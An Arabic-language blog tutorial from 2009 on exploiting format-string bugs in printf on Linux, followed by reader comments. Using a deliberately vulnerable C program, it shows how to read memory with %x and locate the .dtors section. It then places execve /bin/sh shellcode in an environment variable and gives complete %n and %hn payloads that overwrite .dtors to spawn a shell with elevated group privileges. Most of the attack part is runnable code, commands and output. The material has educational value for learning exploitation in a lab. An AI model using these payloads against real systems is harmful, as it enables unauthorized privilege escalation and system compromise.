Wednesday, April 22, 2009

Format string & .dtors section

السلام عليكم...

وطريقه استغلالها بشكل متطور format string بتكلم اليوم عن ثغرات

printf ثغرات الفورمات سترينق تكون في دوال
printf, fprintf, sprintf, snprintf, vprintf, vfprintf, vsprintf, vsnprintf

المستخدم في داله stringوهي عباره عن غلطات او هفوات المبرمجين , عند استخدامهم لهذي الدوال من غير تعريف ال
بالفورمات باراميتر printf

هناك انواع كثيره من الفورمات باراميترز مثل:
unsigned hexadecimal للقرائه من الميموري بصيغة x%
decimal للقرائه من الميموري بصيغة d%
unsigned decimal للقرائه من الميموري بصيغة %u
سترينق %s
للكتابه على الميموري n%
لكتابة 16 بت على الميموري بدلا من 32 بت hn%

الي بيهمنا هو القرائه والكتابه على الميموري.

نجيب كود مضروب ونشرح عليه احسن


#include <%stdio.h%>
#include <%string.h%>

int main(int argc, char **argv) {
char buf[1024];
strncpy(buf, argv[1], sizeof(buf) - 1);

printf(buf);

return 0;
}

استخدمت بدون تحديد الفورمات باراميتر فيها printf مثل ماشايفين, الداله

في المدخلات %x نقدر نقرا بيانات من الميموري اذا استخدمنا

مثلا
[drdeath@SecureDeath lab]$ ./vulnf "%x%x%x%x"
bfffde613f7078257825
[drdeath@SecureDeath lab]$

مثل ما نشوف طلعنا قيم من الميموري بصيغة الهيكس ديسمل.


الحين المطلوب منا ان نكتب الشل كود على الميموري, ونكتب عنوان الشل كود على عنوان من عناوين مسجلات الميموري, في موضوعنا eip السابق عن ثغرات فيض المكدس شرحنا كيف نكتب عنوان الشل كود على مسجل

.dtors هذي المره بنشرح كيف نكتب عنوان الشل كود على عنوان
كومبايلرز GNU الي هو عباره عن مسجل خاص ياتي مع

يشتغل بعد ما يبدا البرنامج بالعمل يعني بعد ما تشتغل الداله .dtors وعنوان
وهو ينظاف على البرنامج بشكل تلقائي بعد ما تعمل له كومبايل بال, main()
يعني لو كتبنا على عنوان ,gcc
عنوان الشل كود لنا بيشتغل الشل كود قبل ما ينهي البرنامج عمله, حلو هذا المطلوب dtor

ممكن نطلعه بطريقتين .dtors اول شي بنطلع عناوين
مثل ما تشوفون عنوان objdump الاولى عن طريق
هو08049510 dtor
[drdeath@SecureDeath lab]$ objdump -h vulnf | grep dtor
16 .dtors 00000008 08049510 08049510 00000510 2**2


بتشوفون عندنا عنوانين الاول بدايه ,nm الثانيه عن طريق
و الثاني نهايته الي هو يزيد عن البدايه باربع بايتات dtor
[drdeath@SecureDeath lab]$ nm vulnf | grep DTOR
08049514 d __DTOR_END__
08049510 d __DTOR_LIST__

يعني على 08049514 dtors نحن نبغي نكتب على نهاية

نبغي نكتب الشل كود على الميموري ونبغي نعرف عنوانه dtors الحين بعد ما طلعنا عنوان

env بنكتب الشل كود على
فاللينكس, ما تهمنا الطريقه الي نكتب فيها الشل كود على الميموري, المهم انه ينكتب وبس
SHELLCODE بنعرف الشل كود على الاينفايرومنت باسم
[drdeath@SecureDeath lab]$ export SHELLCODE=`perl -e 'print "\x90"x50,"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

env نتاكد ان الشل كود انكتب على
[drdeath@SecureDeath lab]$ echo $SHELLCODE
������������������������� 1�Ph//shh/bin��PS�ᙰ
̀
[drdeath@SecureDeath lab]$

تمام امورنا طيبه, الحين نبغي نعرف عنوان الشل كود, ممكن ان نعملها بالطريقه الكلاسيكيه عن طريق
والبحث عن عناوين النوب gdb
[drdeath@SecureDeath lab]$ gdb vulnf
(gdb) b *main
Breakpoint 1 at 0x80483b4
(gdb) run
Starting program: /lab/vulnf

Breakpoint 1, 0x080483b4 in main ()
(gdb) x/200x $esp
..............
...........
...........
0xbfffde5c: 0x00396c65 0x4c454853 0x444f434c 0x90903d45
0xbfffde6c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde7c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde8c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde9c: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e
0xbfffdeac: 0x99e18953 0x80cd0bb0 0x45485300 0x2f3d4c4c
................
..........
.....

مثل ما شايفين شغلنا البرنامج المصاب بالديباقر, وبعدين عملنا
*main في بداية البرنامج عند break point
runوبعدين شغلنا البرنامج
وتصفحنا الميموري , وحصلنا قيم النوب والشل كود بعدها.
وخلاص بيشتغل الشل كود dtor نقدر ناخذ اي عنوان من عناوين النوب هذي ونكتبه على عنوان
ههههههههههههه لا صبرو الموضوع بعده شويه مطول في كمن شغله نحتاج نسويها قبل.

اوكيه هذي الطريقه الكلاسيكيه لايجاد عنوان الشل كود, نقدر بعد نستخدم طريقه ثانيه اسهل, وهي عن طريق استخدام داله في لغه السي getenv()اسمها

هذا البرنامج الصغير بيعطينا عنوان الشل كود مباشره


#include <%stdio.h%>
int main() {
printf("%p",getenv("SHELLCODE"));
return 0; }
[drdeath@SecureDeath lab]$ vi egg.c
[drdeath@SecureDeath lab]$ gcc egg.c -o egg
[drdeath@SecureDeath lab]$ ./egg
0xbfffde7a

البرنامج عطانا العنوان
0xbfffde7a

كان كاتب برنامج خاص يحتوي على عدد من الشل كودز لانطمه مختلفه Qnix أخوي
يقوم بحقن الشل كود في الانفايرومنت ويطعيك عنوانه مباشره
http://www.0x80.org/code/app/envt/envt.c

الحين نبغي نكتب ,dtors الحين حصلنا على عنوان الشل كود وعنوان ال
0xbfffde7a
على
0x08049514

0 الى 32 بت وتحويله الى ديسملxbfffde7a بس اول شي بنحتاج نقسم العنوان
%n علشان نقدر نكتبه بالفورمات باراميتر

بنحول قيم الهيكس الى ديسمل ASCII table باستخدام
http://www.asciitable.com/
او ممكن تستخدمون ادات التحويل من هيكس الى ديسمل
http://drdeath.myftp.org:881/crypt.php ;)

bf = 191
ff = 255
de = 222
7a = 122

الحين بنقوم بعمليه حسابيه بسيطه, بنطرح كل قيمه من القيمه الي تحتها. بس اذا كانت القيمه الاولى اصغر من الثانيه بنضيف لها عدد 256 (roll over) وبعدين بنقوم بالطرح الي تسمى بعملية
قيمة bf=191 < ff=255 // نضيف لها 256 وبعدين بنطرح منها 255
191+256=447-255=192

قيمة ff=255 > de=222 // نطرح بشكل طبيعي
255-222=33

قيمة de=222 > 7a=122 // نطرح بشكل طبيعي
222-122=100

7 قيمةa=122 // أخر قيمة نطرحها دائما من 16
122-16=106

dtors الحين هذا القيم بنكتبها على اربع عناوين من عناوين
نحن عندنا العنوان
0 بنزيد عليه بعد 3 عناوين بعده, يعني بيكون كالتاليx08049514
bf = 192 write on 0x08049517
ff = 33 write on 0x08049516
de = 100 write on 0x08049515
7a = 106 write on 0x08049514


الحين بنحتاج نعرف كم فورمات باراميتر بنحتاج علشان نوصل لعنوان المدخل الي بنكتبه
[drdeath@SecureDeath lab]$ ./vulnf "AAAA %x %x %x %x"
AAAA bfffde59 3ef 0 41414141

%x مثل ماتشوفون بعد حوالي اربع
AAAA وجدنا مكان مدخلنا الي هو
والي يقابله 41414141

ممكن انك تروح مباشره وتستعرض قيمة الخانه الرابعه بهذا الشكل
[drdeath@SecureDeath lab]$ ./vulnf "AAAA"%4\$x
AAAA41414141

بنكتب عناوين AAAA تمام, الحين بنعوض بدل
الاربعه الي عندنا, يعني بتنكتب عناوين الديتورز على هذي الاماكن من الميموري dtors
%4\$x
%5\$x
%6\$x
%7\$x

وبالتالي على هذي الخانات بنروح وبنكتب عنوان الشل كود لنا, الي نحنا حولناه الى صيغه ديسمل 23 بت

سنقوم بكتابة قيم الديسمل التي هي في الحقيقه عنوان الشل كود داخل عناوين الديتور.
%x او %u و %nبنستخدم

الاستغلال سيكون بالشكل التالي
[drdeath@SecureDeath lab]$ ./vulnf `printf "\x14\x95\x04\x08\x15\x95\x04\x08\x16\x95\x04\x08\ x17\x95\x04\x08"`%106x%4\$n%100x%5\$n%33x%6\$n%192 x%7\$n
sh-3.1$ id
uid=500(drdeath) gid=500(drdeath) groups=0(root),10(wheel),500(drdeath)
sh-3.1$

opcode بصيغه dtorلكتاتب عناوين ال printf مثل ما شايفين, استخدمنا
(little endianا (بطريقه عكسيه وفقا لبروسيسرات ال


لكتابت قيم الديسمل على الاماكن الي حددناها الي هي تبدأ من 4 الى 7 %x و %n وبعدها استخدمنا الفورمات سترينق
واشتغل معانا الشل وحصلنا على صلاحيات يوزر اخر الرووت حيث ان الملف المضروب يملك صلاحيات
لليوزر رووت guid

ممكن ايضا كتابت عنوان الشل كود على الديتور بصيغة ديسمل ولكن على شكل 16 بت , بدلا من 32 بت

عنوان الشل كود الي هو
0xbfffde7a
بنقسمه الى قسمين فقط بدل الاربع اقسام, وبنحوله الى ديسمل , النصف الاول بنطرحه من 8 والثاني بنطرحه من الاول. نطبق ونشوف
0xbfffde7a
bfff=49151-8=49143
de7a=56954-49151=7803

الاستغلال بيكون نفس الاستغلال الي كتبناه قبل بس بدل
%hn بنستخدم %n

لكن عناوين الديتور بتكون فقط عنوانين
0x08049514 الاول بيكون
0x08049514+2 والثاني بيكون
0x08049516 الي هو بيكون

bfff=49143 write on 0x08049516
de7a=7803 write on 0x08049514

الاستغلال بيكون بهذا الشكل
[drdeath@SecureDeath lab]$ ./vulnf `perl -e 'print "\x16\x95\x04\x08\x14\x95\x04\x08"'`%.49143u%4\$hn %.7803u%5\$hn
sh-3.1$ id
uid=500(drdeath) gid=500(drdeath) groups=0(root),10(wheel),500(drdeath)
sh-3.1$

مثل ماشايفين ,اكتبنا قيم 16 بت ديسمل على قيم الديتور في العنوانين المحليين
\$hnو %5 \$hn4%
تعطي نفس الناتج ما تفرق %u استخدمنا %x وبدل
واستخدمت
ماتفرق كلهم يعطون نفس النتيجه printf في الاستغلال بدل perl

اتمنى ان يكون الموضوع مفيد , واي استفسار انا حاظر.

تقبلو تحياتي..
Dr.Death

7 comments:

  1. شغل حلو ;) كافي انك ذاكر الكود الي كتبته يعطيك العافيه اخوي

    ReplyDelete
  2. ماشاء الله

    محجوز للقراءه

    ولى عوده

    ReplyDelete
  3. مشكور علي الافاده ويعطيك العافيه

    ReplyDelete
  4. شروحات ميمزة بالنسبة للمتوسطين فالمجال

    ReplyDelete
  5. كيفك يا دكتور

    انا عاوزك تراسلني على الميل ضروري اكيد انت نسيتني
    انا كنت معاك في منتداك لو تفتكرني
    انا Dr.Virus
    وهذا ايميلي لاني بدي اتكلم معاك شوي للضرورة
    dr_virus_viruses@yahoo.com
    ارجو انك تاخد كلامي في الإعتبار
    منتظرك حبيبي

    ReplyDelete
  6. ماشاء الله عليكم


    الله يوفقكم عزيزي ....

    والله شي يشرف ويرفع الراس

    ReplyDelete